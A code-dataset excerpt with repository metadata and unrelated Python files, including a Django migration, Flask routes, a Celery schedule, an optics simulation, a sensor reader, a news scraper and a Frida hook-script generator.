b1ff8b84513e9202e906360be1f456af18f61e26 | 72a3c08aefbdc7d797bc19a93b9cbcf588621f38 | /cil/migrations/0007_auto_20190220_1446.py | 5c5f4e6c15cb9345b6c9819bc9e083d4d0b31c07 | [] | no_license | KapilM26/web-portal | 31bf0b4c05de454d5363b9a0d652291ad5a9b809 | 0138c5055cd19537acf0dec80c04adabf5f1bdc4 | refs/heads/master | 2020-05-04T22:19:38.476546 | 2019-10-19T19:06:09 | 2019-10-19T19:06:09 | 177,403,964 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 775 | py | # Generated by Django 2.1.7 on 2019-02-20 14:46
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cil', '0006_auto_20190220_1436'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='phone',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='tempprofileadd',
name='phone',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='tempprofileedit',
name='phone',
field=models.CharField(blank=True, max_length=100, null=True),
),
]
| [
"kapilm2602@gmail.com"
] | kapilm2602@gmail.com |
6a6762c469e81d373c201c6a168dd6ee3e4c665c | ed75b99e824b5724746d72f2d529781eccf8ef0d | /biostar/celeryconfig.py | 8b2c7b42b8db811498eb7a13032c3e9671c2e8aa | [
"MIT"
] | permissive | satra/biostar-central | 6799c4df4d12de1278f60fb2b29623acf8cc7640 | 794c67d2972a4fe700c79841f5f3c0c562352738 | refs/heads/master | 2021-01-12T20:32:14.356389 | 2014-03-20T15:37:27 | 2014-03-20T15:37:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,202 | py | from __future__ import absolute_import
from datetime import timedelta
from celery.schedules import crontab
CELERY_RESULT_BACKEND = 'djcelery.backends.database:DatabaseBackend'
BROKER_URL = 'django://'
CELERY_TASK_SERIALIZER = 'pickle'
CELERY_ACCEPT_CONTENT = ['pickle']
CELERYBEAT_SCHEDULE = {
'prune_data': {
'task': 'biostar.celery.call_command',
'schedule': timedelta(days=1),
'kwargs': dict(name="prune_data")
},
'sitemap': {
'task': 'biostar.celery.call_command',
'schedule': timedelta(hours=6),
'kwargs': dict(name="sitemap")
},
'update_index': {
'task': 'biostar.celery.call_command',
'schedule': timedelta(minutes=15),
'args': ["update_index"],
'kwargs': {"age": 1}
},
'hourly_dump': {
'task': 'biostar.celery.call_command',
'schedule': crontab(minute=10),
'args': ["biostar_pg_dump"],
'kwargs': {"hourly": True}
},
'daily_dump': {
'task': 'biostar.celery.call_command',
'schedule': crontab(hour=22),
'args': ["biostar_pg_dump"],
},
}
CELERY_TIMEZONE = 'UTC' | [
"istvan.albert@gmail.com"
] | istvan.albert@gmail.com |
4c8789502e04a606f59277018560cc68fbb0db97 | 2cd43643bd8f09be05f91b9d3bc75fb3eb373938 | /management/inventory_manager.py | 3dca501b4f2341ba81783f2123d430e1710fb0c6 | [] | no_license | NguyenDytrich/BiblioTech | 0c168b5138042cd3f37d5ad35d0e8e5acaa371a8 | 4fea0598313e1ee96f975f5f0bfc388d96ac14a6 | refs/heads/dev | 2022-12-31T15:57:11.305039 | 2020-10-27T02:25:08 | 2020-10-27T02:25:08 | 300,519,116 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,186 | py | from django.utils import timezone
from library.models import Item, ItemGroup
def create_item_record(
itemgroup_id,
library_id,
serial_num,
condition,
availability,
notes=None,
date_acquired=None,
last_inspected=None,
):
"""
Creates and saves a new item record, creates an audit log entry for the new incoming inventory
"""
item = Item(
item_group=ItemGroup.objects.get(pk=itemgroup_id),
library_id=library_id,
serial_num=serial_num,
condition=condition,
availability=availability,
notes=notes,
date_acquired=date_acquired if date_acquired else timezone.now(),
last_inspected=last_inspected if last_inspected else timezone.now(),
)
item.full_clean()
item.save()
# TODO: audit log entry
return item
def create_itemgroup_record(
make, model, description, default_checkout_len, moniker=None
):
itemgroup = ItemGroup(
make=make,
model=model,
description=description,
moniker=moniker,
default_checkout_len=default_checkout_len,
)
itemgroup.full_clean()
itemgroup.save()
return itemgroup
| [
"nguyen.dytrich@gmail.com"
] | nguyen.dytrich@gmail.com |
1ff9e56b2e34e0e6d083dcf2edf4cd1fc303a900 | 15206c297cfaf3995b0ccc7c8854fffb225f811b | /src/components/event/__init__.py | 64576b5c23f703efab46f42d4a0b862aa6562b39 | [] | no_license | baileythuong/CoderSchool-ticketbox | f5f67cf9d5d993d82d50279d7ba83758e8a568cb | 7a8dd5882c7206404e74a6a8babf32ca7dd3f079 | refs/heads/master | 2021-06-26T21:08:15.720262 | 2019-11-24T11:51:15 | 2019-11-24T11:51:15 | 223,735,900 | 0 | 0 | null | 2021-03-20T02:15:03 | 2019-11-24T11:51:47 | HTML | UTF-8 | Python | false | false | 1,528 | py | from flask import Blueprint, render_template, request, redirect, url_for, flash
from flask_login import current_user, login_user, login_required, logout_user
from src.models import Event
from src import app, db
from flask_login import current_user
from flask_moment import Moment
moment = Moment(app)
# import pdb; pdb.set_trace()
event_blueprint = Blueprint('event_blueprint', __name__, template_folder='../../templates')
@event_blueprint.route("/events", methods=["GET", "POST"])
@login_required
def events():
events = Event.query.all()
if request.method == "POST":
new_event = Event(
event_name = request.form["event_name"],
event_description = request.form["event_description"],
event_banner = request.form["event_banner"],
event_address = request.form["event_address"],
event_time = request.form["event_time"],
ticket_price = request.form["ticket_price"],
ticket_stock = request.form["ticket_stock"],
user_id = current_user.id
)
db.session.add(new_event)
db.session.commit()
flash("Successfully added a new event.", "success")
return redirect(url_for("event_blueprint.events"))
return render_template("event/events.html", events = events)
@event_blueprint.route("/events/<id>", methods=["GET", "POST"])
def event_detail(id):
action = request.args.get('action')
event = Event.query.get(id)
return render_template("event/view_event.html", event = event)
| [
"baileythuong@gmail.com"
] | baileythuong@gmail.com |
081a8a4aa09d2eafd182ca6436c7c72218f6dcc5 | 3efee0cf2bd9e0c34bfdd94ab24a15cb88c04509 | /TMM_examples/TMM_fabry_perot.py | 13a671883453a7e29f38c3f94209049946a45615 | [
"MIT"
] | permissive | luwl85/Rigorous-Coupled-Wave-Analysis | bf5016ec70525f5e7bf59dfa93a03902afdfac12 | a28fdf90b5b5fc0fedacc8bb44a0a0c2f2a02143 | refs/heads/master | 2023-04-25T20:46:45.397976 | 2021-05-20T22:17:54 | 2021-05-20T22:17:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,761 | py | '''
TMM applied to a single uniform layer
should recover the analytic fabry perot solution
'''
import os
import sys
module_path = os.path.abspath(os.path.join('..'))
if module_path not in sys.path:
sys.path.append(module_path)
import numpy as np
import matplotlib.pyplot as plt;
import cmath;
from TMM_functions import run_TMM_simulation as rTMM
## GOAL: simulate a BRAGG MIRROR at some wavelength (1 micron)
#%% DEFINE SIMULATION PARAMETers
#% General Units
degrees = np.pi/180;
L0 = 1e-6; #units of microns;
eps0 = 8.854e-12;
mu0 = 4*np.pi*10**-7;
c0 = 1/(np.sqrt(mu0*eps0))
## normalized units
#z' = k0*z;
#k = k/k0;
## REFLECTION AND TRANSMSSION SPACE epsilon and mu PARAMETERS
m_r = 1; e_r = 1; incident_medium = [e_r, m_r];
m_t = 1; e_t = 1; transmission_medium = [e_t, m_t];
## set wavelength scanning range
wavelengths = np.linspace(0.5,1.6,500); #500 nm to 1000 nm
kmagnitude_scan = 2 * np.pi / wavelengths; #no
omega = c0 * kmagnitude_scan; #using the dispersion wavelengths
#source parameters
theta = 0 * degrees; #%elevation angle; #off -normal incidence does not excite guided resonances...
phi = 0 * degrees; #%azimuthal angle
## incident wave properties, at this point, everything is in units of k_0
n_i = np.sqrt(e_r*m_r);
#k0 = np.sqrt(kx**2+ky**2+kz**2); we know k0, theta, and phi
#actually, in the definitions here, kx = k0*sin(theta)*cos(phi), so kx, ky here are normalized
kx = n_i*np.sin(theta)*np.cos(phi); #constant in ALL LAYERS; kx = 0 for normal incidence
ky = n_i*np.sin(theta)*np.sin(phi); #constant in ALL LAYERS; ky = 0 for normal incidence
print((n_i**2, kx**2+ky**2))
kz_inc = cmath.sqrt(e_r * m_r - kx ** 2 - ky ** 2);
normal_vector = np.array([0, 0, -1]) #positive z points down;
ate_vector = np.matrix([0, 1, 0]); #vector for the out of plane E-field
#ampltidue of the te vs tm modes (which are decoupled)
pte = 1; #1/np.sqrt(2);
ptm = 0; #cmath.sqrt(-1)/np.sqrt(2);
polarization_amplitudes = [pte, ptm]
k_inc = [kx, ky];
print('--------incident wave paramters----------------')
print('incident n_i: '+str(n_i))
print('kx_inc: '+str(kx)+' ky_inc: '+str(ky))
print('kz_inc: ' + str(kz_inc));
print('-----------------------------------------------')
#thickness 0 means L = 0, which only pops up in the xponential part of the expression
ER = [12]
UR = [1]
layer_thicknesses = [0.6]
## run simulation
Ref, Tran = rTMM.run_TMM_simulation(wavelengths, polarization_amplitudes, theta, phi, ER, UR, layer_thicknesses,\
transmission_medium, incident_medium)
plt.figure();
plt.plot(wavelengths, Ref);
plt.plot(wavelengths, Tran);
plt.title('Spectrum of a Bragg Mirror')
plt.xlabel('wavelength ($\mu m$)')
plt.ylabel('R/T')
plt.legend(('Ref','Tran'))
plt.savefig('bragg_TMM.png');
plt.show(); | [
"nzz2102@stanford.edu"
] | nzz2102@stanford.edu |
30793b7f98a113cd57ce8f99b439e0f8b0aff4d5 | 377acfd77a5cd281c80428b368248003ebdc33dc | /SpinboxExample.py | af01f7fc21f78144a1fa49e6577f32759a8ec33c | [] | no_license | roilhi/ExamplesTkinterPy | d049f0a4803fa35d31a623b05244e645622fa0d1 | 865fe983e07d9fdd04075e516b3dabd9f5e167df | refs/heads/main | 2023-06-11T22:03:24.219169 | 2021-07-07T21:56:30 | 2021-07-07T21:56:30 | 382,460,222 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 266 | py | from tkinter import *
from tkinter import messagebox
root = Tk()
root.geometry("400x300")
w = Spinbox(root, values=("Python", "HTML5", "Java", "Javascript"))
w.pack()
e = Spinbox(root, values=("Carne", "Verdura", "Pasta"))
e.pack()
root.mainloop() | [
"noreply@github.com"
] | noreply@github.com |
325a93e9027f90d97fe0431288393f2f293520c7 | 90b8d12660adc7dcf63bffce20ba1b7ede64386a | /official/vision/beta/serving/export_saved_model.py | 95027be136a8209c9e2a438072cf195c7d18771c | [
"Apache-2.0"
] | permissive | thalitadru/models | 7109797ed536ccb10e17bba6add0f571a1c1c96d | 7faaa572db44621f8e2998abd8dc6a22e86001f2 | refs/heads/master | 2022-05-05T15:04:01.683629 | 2022-03-23T16:20:46 | 2022-03-23T16:20:46 | 82,706,460 | 3 | 0 | null | 2017-02-21T17:14:13 | 2017-02-21T17:14:12 | null | UTF-8 | Python | false | false | 3,850 | py | # Copyright 2022 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Vision models export binary for serving/inference.
To export a trained checkpoint in saved_model format (shell script):
EXPERIMENT_TYPE = XX
CHECKPOINT_PATH = XX
EXPORT_DIR_PATH = XX
export_saved_model --experiment=${EXPERIMENT_TYPE} \
--export_dir=${EXPORT_DIR_PATH}/ \
--checkpoint_path=${CHECKPOINT_PATH} \
--batch_size=2 \
--input_image_size=224,224
To serve (python):
export_dir_path = XX
input_type = XX
input_images = XX
imported = tf.saved_model.load(export_dir_path)
model_fn = imported.signatures['serving_default']
output = model_fn(input_images)
"""
from absl import app
from absl import flags
from official.common import registry_imports # pylint: disable=unused-import
from official.core import exp_factory
from official.modeling import hyperparams
from official.vision.beta.serving import export_saved_model_lib
FLAGS = flags.FLAGS
flags.DEFINE_string(
'experiment', None, 'experiment type, e.g. retinanet_resnetfpn_coco')
flags.DEFINE_string('export_dir', None, 'The export directory.')
flags.DEFINE_string('checkpoint_path', None, 'Checkpoint path.')
flags.DEFINE_multi_string(
'config_file',
default=None,
help='YAML/JSON files which specifies overrides. The override order '
'follows the order of args. Note that each file '
'can be used as an override template to override the default parameters '
'specified in Python. If the same parameter is specified in both '
'`--config_file` and `--params_override`, `config_file` will be used '
'first, followed by params_override.')
flags.DEFINE_string(
'params_override', '',
'The JSON/YAML file or string which specifies the parameter to be overriden'
' on top of `config_file` template.')
flags.DEFINE_integer(
'batch_size', None, 'The batch size.')
flags.DEFINE_string(
'input_type', 'image_tensor',
'One of `image_tensor`, `image_bytes`, `tf_example` and `tflite`.')
flags.DEFINE_string(
'input_image_size', '224,224',
'The comma-separated string of two integers representing the height,width '
'of the input to the model.')
flags.DEFINE_string('export_checkpoint_subdir', 'checkpoint',
'The subdirectory for checkpoints.')
flags.DEFINE_string('export_saved_model_subdir', 'saved_model',
'The subdirectory for saved model.')
def main(_):
params = exp_factory.get_exp_config(FLAGS.experiment)
for config_file in FLAGS.config_file or []:
params = hyperparams.override_params_dict(
params, config_file, is_strict=True)
if FLAGS.params_override:
params = hyperparams.override_params_dict(
params, FLAGS.params_override, is_strict=True)
params.validate()
params.lock()
export_saved_model_lib.export_inference_graph(
input_type=FLAGS.input_type,
batch_size=FLAGS.batch_size,
input_image_size=[int(x) for x in FLAGS.input_image_size.split(',')],
params=params,
checkpoint_path=FLAGS.checkpoint_path,
export_dir=FLAGS.export_dir,
export_checkpoint_subdir=FLAGS.export_checkpoint_subdir,
export_saved_model_subdir=FLAGS.export_saved_model_subdir)
if __name__ == '__main__':
app.run(main)
| [
"gardener@tensorflow.org"
] | gardener@tensorflow.org |
5a25dd47a898ad67f1fd9e8ec65142b8677abeb6 | 161999144a6b35135a23f148097aba6601e19508 | /specviz/io/model_io/yaml_model_io.py | b6e771c38987886e0fd2ffd0080a300fdd2aeae0 | [] | no_license | Polapon/specviz | 0eec454916c7f6c147c9901e5d692eb94594ec37 | 744826291b0f1d5e9177a207b734f896771c4a21 | refs/heads/master | 2021-01-11T09:44:39.622149 | 2016-12-19T18:37:39 | 2016-12-19T18:37:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,165 | py | #
# Functions in this module support the reading and writing
# of astropy's spectral compound models from/to YAML files.
#
import os
import sys
import re
import dis
import copy
import yaml
from io import StringIO
from ast import literal_eval
from qtpy.QtWidgets import QFileDialog
from specviz.interfaces.factories import ModelFactory
from specviz.core.layer import ModelLayer
MODEL_FILE_FILTER = "YAML files (*.yaml)"
EXPRESSION_NAME = 'arithmetic behavior'
MODEL_NAME = 'model'
# Helper functions
def _get_model_class_name(function):
class_string = str(function.__class__)
return class_string.split('\'>')[0].split(".")[-1]
# ---------- From YAML file to model ------------------------'
def _ingest_constraints(param_dict):
bounds = param_dict['constraints']['bounds']
fixed = param_dict['constraints']['fixed']
tied = param_dict['constraints']['tied']
# bounds are tuples stored as strings so the user
# can read and edit the file using a text editor.
# They need to be converted back to python tuples.
for name in bounds:
bound = literal_eval(bounds[name])
bounds[name] = (bound[0], bound[1])
# TODO: re-do this when implementing ties
# YAML returns different data types depending
# on the model type. They need to be properly
# converted.
for name in fixed:
if isinstance(fixed[name], str):
fixed[name] = literal_eval(fixed[name])
tied[name] = literal_eval(tied[name])
return bounds, fixed, tied
def _build_single_model(in_map, model_name=None):
if model_name is None:
entry_name = list(in_map.keys())[0]
else:
entry_name = model_name
model_name = in_map[entry_name]['class']
# model names in ModelFactory do not terminate
# with a redundant '1D' suffix; remove it.
model_cls = ModelFactory.all_models[model_name[:-2]]
param_dict = in_map[entry_name]
name = param_dict['name']
bounds, fixed, tied = _ingest_constraints(param_dict)
# the model constructor call can directly handle
# all parameter constraints, and the name
model = model_cls(name=name, bounds=bounds, fixed=fixed, tied=tied)
# parameter values are top level objects in the model
# instance, unlike other parameter attributes such as
# bounds and ties. They have to be set explicitly.
parameters = param_dict['parameters']
for pname in parameters:
value = float(param_dict['parameters'][pname])
setattr(model, pname, value)
return model
# If no arithmetic behavior expression is know,
# build a compound model by adding together all
# models present in the map.
def _build_additive_model(in_map):
model = None
for model_name in in_map[MODEL_NAME]:
in_model = _build_single_model(in_map[MODEL_NAME], model_name=model_name)
if model is None:
model = in_model
else:
model += in_model
return model
# If an arithmetic behavior expression is present,
# use it to build the compound model
def _build_compound_model(in_map):
model_list = []
for model_name in in_map[MODEL_NAME]:
model_list.append(_build_single_model(in_map[MODEL_NAME], model_name=model_name))
formula = in_map[EXPRESSION_NAME]
return ModelLayer.from_formula(model_list, formula), formula
def buildModelFromFile(fname):
"""
Builds a compound model specified in a YAML file.
This is the main entry point for the 'read from file'
functionality. The caller is responsible for providing
the full-path file name.
Parameters
----------
fname: str
the ffully qualified file name
"""
directory = os.path.dirname(fname)
f = open(fname, "r")
in_map = yaml.safe_load(f)
f.close()
expression = ""
if MODEL_NAME in in_map:
# compound model
if EXPRESSION_NAME in in_map and len(in_map[EXPRESSION_NAME]) > 0:
model, expression = _build_compound_model(in_map)
else:
# add all models together if no formula is present
model = _build_additive_model(in_map)
else:
# single model
model = _build_single_model(in_map)
return model, expression, directory
# ---------- From model to YAML file ------------------------'
# Builds a dictionary with model constraints by directly
# referring to the _constraints attribute in a model.
def _build_constraints_dict(model):
constraints_dict = copy.deepcopy(model._constraints)
# bounds are stored as strings so
# they can be edited by the user.
for name in constraints_dict['bounds']:
bound1 = constraints_dict['bounds'][name][0]
bound2 = constraints_dict['bounds'][name][1]
constraints_dict['bounds'][name] = "(%s,%s)" % (str(bound1), str(bound2))
# clean up. This is something that exists only
# in single models and is not needed to rebuild
# the model from its YAML description.
if 'eqcons' in constraints_dict:
constraints_dict.pop('eqcons')
constraints_dict.pop('ineqcons')
return constraints_dict
# From a single model, builds the dict to be output to YAML file.
def _build_output_dict_single(model):
model_name = model.name
param_dict = {}
for name, value in zip(model.param_names, model.parameters):
param_dict[name] = str(value)
constraints = _build_constraints_dict(model)
model_dict = {
'name': model_name,
'class': _get_model_class_name(model),
'parameters': param_dict,
'constraints': constraints}
return model_name, model_dict
# From a compound model, builds the dict to be output to YAML file.
def _build_output_dict_compound(model):
model_name = model.name
param_dict = {}
for parameter_name, value in zip(model.param_names, model.parameters):
param_dict[parameter_name] = str(value)
# In a compound model, we don't want the constraints as stored in
# the _constraints attribute, because these are keyed by the parameter
# names *in the compound model*, such as 'amplitude_0'. We need keys
# that relate directly with the underlying Parameter objects. Thus we
# cannot use method _build_constraints_dict, since it uses a direct
# copy of the _constraints attribute to drive its machinery.
constraints_dict = {'bounds':{},'tied':{},'fixed':{}}
for parameter_name in model.param_names:
parameter = getattr(model, parameter_name)
for constraint_name in parameter.constraints:
constraint = getattr(parameter, constraint_name)
constraints_dict[constraint_name][parameter_name] = str(constraint)
model_dict = {
'name': model_name,
'class': _get_model_class_name(model),
'parameters': param_dict,
'constraints': constraints_dict}
return model_name, model_dict
# Writes a dict to YAML file.
def _writeToFile(out_model_dict, model_directory, parent):
fname = QFileDialog.getSaveFileName(parent, 'Save to file', model_directory)[0]
if len(fname) > 0:
# enforce correct suffix.
if not fname.endswith(".yaml"):
fname += ".yaml"
f = open(fname, "w")
yaml.dump(out_model_dict, f,default_flow_style=False)
f.close()
# Handles the case of a spectral model with a single component. It's
# not strictly a compound model, but saving and retrieving isolated
# components as if they were compound models makes for a simpler
# interface.
def _writeSingleComponentModel(model, model_directory, parent):
out_model_dict = {}
model_name, model_dict = _build_output_dict_single(model)
out_model_dict[model_name] = model_dict
_writeToFile(out_model_dict, model_directory, parent)
# Handles the case of a compound model
def _writeCompoundModel(compound_model, model_directory, parent, expression):
out_model_dict = {MODEL_NAME:{}}
for model in compound_model:
model_name, model_dict = _build_output_dict_compound(model)
out_model_dict[MODEL_NAME][model_name] = model_dict
out_model_dict[EXPRESSION_NAME] = expression
_writeToFile(out_model_dict, model_directory, parent)
def saveModelToFile(parent, model, model_directory, expression=None):
"""
Saves spectral model to file.
This is the main entry point for the 'save to file'
functionality.
Parameters
----------
parent : QWidget or None
optional widget used for screen centering.
expression: str
the formula associated with the compound model
"""
if not hasattr(model, '_format_expression'):
_writeSingleComponentModel(model, model_directory, parent)
else:
_writeCompoundModel(model, model_directory, parent, expression)
#--------------------------------------------------------------------#
#
# Utility functions that might be used when we implement ties.
#
# Disassembles a tie callable. Ties read from a model
# file are not directly accessible in text form because
# the model file is compiled at import time.
def get_tie_text(tie):
if tie:
# dis() only outputs on standard output.....
keep = sys.stdout
sys.stdout = StringIO()
dis.dis(tie)
assembler_text = sys.stdout.getvalue()
sys.stdout.close()
sys.stdout = keep
result = _parse_assembler_text(assembler_text)
else:
result = 'False'
return result
# This parses the text returned by the disassembler for
# a lambda function that multiplies a constant by a
# variable. That is, we are assuming that ties are coded
# as lambda functions with multiplication by a constant,
# as in the STSDAS' specfit task.
parser = re.compile(r'\(([^)]+)\)') # picks up whatever is enclosed in parenthesis
def _parse_assembler_text(text):
tokens = parser.findall(text)
factor = tokens[0]
lambda_variable_name = tokens[1]
function_id = tokens[2]
par_name = tokens[3]
return "lambda %s: %s * %s[%s].%s" % \
(lambda_variable_name,
factor,
lambda_variable_name,
function_id,
par_name)
| [
"nchlsearl@gmail.com"
] | nchlsearl@gmail.com |
a3bfa9e158ba5fe5b5a7697cfc74d1a729aefa2a | 65c616c59ae005debf91d82f4efc7f7cdcc2a7a4 | /news_recommendation/home/forms.py | a4274fbc39b814ece457b077eceefcf942431907 | [] | no_license | nghiatd16/most_cb | 28db8b0c52cc391f6890f2a56c8dee308a6dfc85 | 46d91016b20d57f3f43b63813f7fbccd5626a848 | refs/heads/master | 2022-12-25T17:33:04.896024 | 2020-09-19T08:34:15 | 2020-09-19T08:34:15 | 296,822,425 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 137 | py | from django.forms import ModelForm
import django.forms as forms
from django.conf import settings
import os
import glob
import shutil
| [
"nghiatd.proptit@gmail.com"
] | nghiatd.proptit@gmail.com |
8bc161a569ad8a54e4ac31af3570489611c0b553 | 2d6824fec53681a88d0566886b20895f5cbb1c89 | /article_scraping/article_scrapes/bdnews_scrape.py | da97d19e65635f0e570d04f36d01bbac89a466fe | [] | no_license | IRI-Bangladesh-Flood-Insurance-Research/bangladesh-nlp-flood-research | 715439d9115a7786cd8f6d3c41751b917bd401d2 | 8d69cbd3c5d56ac42e1b7473c70dfe9cddf2c735 | refs/heads/master | 2023-05-05T18:56:01.616917 | 2021-05-25T15:19:06 | 2021-05-25T15:19:06 | 289,547,572 | 1 | 5 | null | 2020-08-28T21:13:48 | 2020-08-22T18:48:00 | Jupyter Notebook | UTF-8 | Python | false | false | 1,103 | py | from unidecode import unidecode
from bs4 import BeautifulSoup
import requests
def bdnewsScrape(soup, meta):
# print(soup)
# main_div = soup.find('div')
# print(main_div.find('article'))
# print(main_div.find('article').get_text())
headline, text = None, ''
headline = soup.find('h1', class_='print-only')
if headline: headline = headline.text.strip()
textmain = soup.find('div', class_='wrappingContent')
textp = textmain.find_all('p')
# print(textp)
if textp: text = ' '.join([p.text for p in textp if 'photo:' not in p.text.lower()])
if headline: headline = unidecode(headline)
if text: text = unidecode(text)
return {
'headline': headline,
'text': 'Date Published:{} \n'.format(meta['datePublished'])+text
}
if __name__=='__main__':
site = 'https://bdnews24.com/bangladesh/2014/11/01/massive-blackout-brings-bangladesh-to-its-knees'
meta = {'datePublished':'TRIAL'}
page = requests.get(site)
# print(page.text)
soup = BeautifulSoup(page.text, 'html.parser')
print(bdnewsScrape(soup, meta))
| [
"tvp2107@columbia.edu"
] | tvp2107@columbia.edu |
10ca6b44c4aa6f1371af59bbb41cb3c72a722dc6 | 333b2e1284be6ea06a9989bcc76fd296f5c4f0a4 | /historicalVersion/MyLife v1.00.py | dcf7177fb0d0e7b798cf665981e4835db7c18d7a | [] | no_license | luomeng007/MyLife | 567df155a30857e2c5f03049611d83eb0a847c02 | 76447fdfeaa83d7b77964560d56c67ce2cd36905 | refs/heads/main | 2023-01-20T14:17:30.613718 | 2020-11-29T10:46:26 | 2020-11-29T10:46:26 | 309,741,680 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,948 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Nov 4 19:29:04 2020
@author: 15025
main program of game---My Life
"""
import pygame
import sys
version = 'v1.00'
class MainGame:
# the size of game window
__SCREEN_WIDTH = 1000
__SCREEN_HEIGHT = 800
window = None
def __init__(self):
# initialize modules of pygame
pygame.init()
# set window size of game
MainGame.window = pygame.display.set_mode([MainGame.__SCREEN_WIDTH, MainGame.__SCREEN_HEIGHT])
# set caption of window
pygame.display.set_caption('My Life ' + version)
# play background music
self.playaBackgroundMusic()
def mainGame(self):
# main loop of game
while True:
# wait for click game
self.exitGame()
@staticmethod
# define a exit method of game
def exitGame():
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
@staticmethod
def playaBackgroundMusic():
# create Music instance
m = Music(r"C:/Users/15025/Desktop/MyLife/musics/逍遥传说.mp3")
# we need to give a parameter count here, but it has default value, so
# we also could leave out it here
m.playMusic()
class Music:
def __init__(self, music):
# use self.music store music we want to play
self.music = music
# this is not necessary, at the beginning we initialized all modules
# pygame.mixer.init()
# load music
pygame.mixer.music.load(self.music)
@staticmethod
def playMusic(count=-1):
# play background music in loop, for count = -1
pygame.mixer.music.play(count)
# execute program
if __name__ == "__main__":
# ML for My Life
game_ML = MainGame()
game_ML.mainGame()
| [
"noreply@github.com"
] | noreply@github.com |
4dfef08409cab37c02c98cb9113fdca1e36eeaa6 | 6ec817ef27a612209adebf927689073510c1c0ef | /podprojekty/czujnik temperatury na rfm12b/czujniki.py | a06f69646cddcdd2f2e409d730a5a07549f64547 | [] | no_license | uzi18/sterownik | eafa5caf317f48ad79735f8adf43618258f74aa0 | e53e18d75375e0db319ab2d5652ee19794328e5d | refs/heads/master | 2022-03-17T22:49:56.024308 | 2022-02-25T00:15:38 | 2022-02-25T00:15:38 | 24,689,808 | 24 | 15 | null | 2017-11-16T19:21:55 | 2014-10-01T18:19:52 | Python | UTF-8 | Python | false | false | 1,339 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import time
import serial
import sys
import sdnotify
if sys.version_info[0] == 3:
from urllib.request import urlopen
else:
from urllib2 import urlopen
try:
import konfiguracja
except ImportError:
raise ImportError('brak pliku konfiguracji polaczenia ze sterownikiem: konfiguracja.py')
rs=serial.Serial('/dev/ttyS0',9600)
#print("zainicjowalem serial, czekam na dane")
if 'ip_domoticz' in dir(konfiguracja) and 'port_domoticz' in dir(konfiguracja):
domoticz = "http://"+konfiguracja.ip_domoticz+":"+str(konfiguracja.port_domoticz)+"/json.htm?type=command¶m=udevice&idx="
value = "&nvalue=0&svalue="
n = sdnotify.SystemdNotifier()
n.notify("READY=1")
while 1:
try:
data=''
rs.flushInput()
rs.flushOutput()
while not (data.startswith("start:") and data.endswith("\r\n")):
data = rs.readline()
data = data.replace("\r\n", "")
data = data.replace("start:", "")
data = data.replace(":stop", "")
data = data.split(":", 3)
print(data)
temp = data[1]
temp = float(temp)/100
# print(temp)
nodeid = data[0]
tens = data[2]
tens = float(tens)/1000
# print(tens)
response = urlopen(domoticz + "17" + value + str(temp))
# print(domoticz + "5" + value + str(data))
n.notify("WATCHDOG=1")
except:
pass
| [
"uzi18@o2.pl"
] | uzi18@o2.pl |
a4c1631df98fba75752807327669ecd1f9bef260 | 0f5d780a18d5d0937df02da9add0db73aa1c7158 | /dissector/frida/frida_writer.py | 54933ebce2e081edb39542afc20b01c281e4803e | [] | no_license | SergioLazaro/apkdissector | 13e86bea37b188ae94c182c5c534b6296f3a5939 | df1741632ab5395170e94ad9fb52a500cd5f0718 | refs/heads/master | 2021-01-12T19:23:13.525953 | 2016-12-26T11:11:23 | 2016-12-26T11:11:23 | 53,853,327 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,992 | py | __author__ = 'sergio'
class frida_writer:
def __init__(self, filepath, classname):
self.filepath = filepath
self.classname = classname
self.python_path = self.filepath + ".py"
self.javascript_path = self.filepath + ".js"
self.file = open(self.javascript_path,"a")
def close_file(self):
self.file.close()
def write_frida_header(self):
self.file.write("Java.perform(function() {\n")
self.file.write("\t// Class to hook\n")
self.file.write("\tvar ThisActivity = Java.use('" + self.classname + "');\n")
def write_frida_hook(self,method):
if method is not None:
self.file.write("\tThisActivity." + method.methodname + ".implementation = function() {\n")
self.file.write("\t\tsend('hook - " + method.methodname + "')\n")
self.file.write("\t};\n")
def write_frida_python(self,package_name):
self.close_file()
self.file = open(self.python_path,"w")
#Write header
self.file.write('import frida, sys\n')
self.file.write('package_name = "' + package_name + '"\n')
#Write function get_messages_from_js
self.file.write('def get_messages_from_js(message, data):\n')
self.file.write('\tprint(message)\n')
self.file.write("\tprint(message['payload'])\n")
#Write function instrument_load_url
self.file.write("def instrument_load_url():\n")
self.file.write("\twith open('" + self.classname + ".js', 'r') as myfile:\n")
self.file.write("\t\thook_code = myfile.read()\n")
self.file.write("\treturn hook_code\n")
#Write bottom
self.file.write("process = frida.get_usb_device().attach(package_name)\n")
self.file.write("script = process.create_script(instrument_load_url())\n")
self.file.write("script.on('message',get_messages_from_js)\n")
self.file.write("script.load()\n")
self.file.write("sys.stdin.read()\n") | [
"sergiozgz1994@gmail.com"
] | sergiozgz1994@gmail.com |
